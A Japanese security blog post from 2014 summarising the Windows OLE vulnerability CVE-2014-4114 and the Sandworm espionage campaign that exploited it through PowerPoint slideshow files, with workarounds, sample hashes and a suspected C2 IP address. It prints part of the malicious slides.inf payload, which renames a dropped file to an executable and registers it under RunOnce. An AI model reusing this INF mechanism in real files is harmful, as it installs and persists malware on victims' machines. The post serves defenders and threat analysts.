ブログトップ 記事一覧 ログイン 無料ブログ開設

piyolog RSSフィード

2014-10-15

Windows OLEの脆弱性(CVE-2014-4114)関連情報をまとめてみた

| 00:58 |  Windows OLEの脆弱性(CVE-2014-4114)関連情報をまとめてみたを含むブックマーク

iSight Partnersが調査を行ったサイバーエスピオナージで未修正のWindows脆弱性が悪用されていたことが判明し、Microsoftとの調整を経て同社は2014年10月14日(現地時間)にこの活動に関する情報を発表しました。ここでは脆弱性、及びそれを悪用する活動に関連する情報をまとめます。

脆弱識別情報

  • CVE-2014-4114

発見者

発見日

影響を受けるWindows

CVE-2014-4114を悪用した攻撃シナリオ

  • Exploit(OLEオブジェクト)が含まれたMicrosoft Officeファイルをダウンロード、またはメール等で受信し、かつ開いた場合に影響を受ける可能性がある。
  • 保護されたビューで開封した場合はリスクを軽減してファイル内容を確認することが可能。
  • 脆弱性が悪用された場合、現在のユーザーと同じユーザー権限となる。
悪用が確認されているPowerPoint関係のファイルについて

CVE-2014-4114が埋め込まれたPowerPointファイルが確認されている。ファイルの種別によって挙動が異なる。

ファイル種別拡張子開封時動作悪用時のUAC表示報告事例
PowerPointプレゼンテーション.pptx
.ppt
編集モード表示される報告無し
PowerPointスライドショー.ppsx
.pps
プレゼンテーションモード表示されない報告有り
OLEについて

OLE とは何ですか?

OLE (Object Linking and Embedding) は、複合データを作成および編集する機能など、データや機能をアプリケーションで共有できるようにするテクノロジです。複合データとは、複数の形式の情報が含まれるデータです。たとえば、複合 Microsoft Word 文書には、埋め込み Microsoft Excel スプレッドシート (つまり OLE オブジェクト) が含まれる場合があります。このテクノロジにより、埋め込み先での編集も可能になります。OLE オブジェクトがアクティブにされている際、新たなアプリケーションは起動せず、その代わり、ユーザーがそれまで使用していたアプリケーション内に新たなメニュー アイテムのセットが表示されます。OLE の詳細については、「Compound Documents」(英語情報) を参照してください。

https://technet.microsoft.com/ja-jp/library/security/MS14-060

対策

回避策

  • iSIGHT Partners、Microsoftは以下3つの回避策を紹介している。詳細はMS14-060参照のこと
    • WebClientサービスの無効化
    • TCP 139/445ポートの遮断
    • セットアップ情報ファイル(.inf)経由での実行ファイルの起動抑止

CVE-2014-4114を悪用するサイバーエスピナオージ

組織名称

  • SandWorm Team
    • iSIGHT Partnersが命名
    • iSIGHT Partnersが監視しているロシア系組織5つの内の1つ。
    • 2009年からの活動を確認
関連情報

iSIGHT Partnersが確認した標的組織

サンプル検体

FileTypeHashSandbox Analysis
spiski_deputatov_done.ppsxExploit
(CVE-2014-4114)
70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aafMalwr
slide1.exe
(slide1.gif)
Payload0fda6c118fb7dc946440cb9225e32ab1825d87d4f088bb75a6eab7cef35433bcMalwr
ThreatExpert
slides.infPayload(.inf)1dc8e4a5be35f12b26b1ca4340b8f08ad073c67203d05392a4b9e7b9e9635d63-
PPSXの内容と思われるもの
Slides.infの内容(一部?)

; 61883.INF

; Copyright (c) Microsoft Corporation. All rights reserved.

 

[Version]

Signature = "$CHICAGO$"

Class=61883

ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}

Provider=%Msft%

DriverVer=06/21/2006,6.1.7600.16385

 

[DestinationDirs]

DefaultDestDir = 1

 

[DefaultInstall]

RenFiles = RxRename

AddReg = RxStart

 

[RxRename]

slide1.gif.exe, slide1.gif

[RxStart]

HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe

http://pastebin.com/rfYAdRrF
接続先と思われるIPアドレス

94.185.85.122

https://www.virustotal.com/en/file/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf/analysis/
関連リンク

謝辞

この記事は次の方の情報を元に追記を行っています。

  • @0x009AD6_810さん

更新履歴

  • 2014/10/15 AM 新規作成
  • 2014/10/15 AM サンプルの接続先と思われるIPアドレスを追加
  • 2014/10/15 AM MS14-060関連の情報を追加
  • 2014/10/15 AM 関連リンク追加
  • 2014/10/15 PM infファイルの情報を追加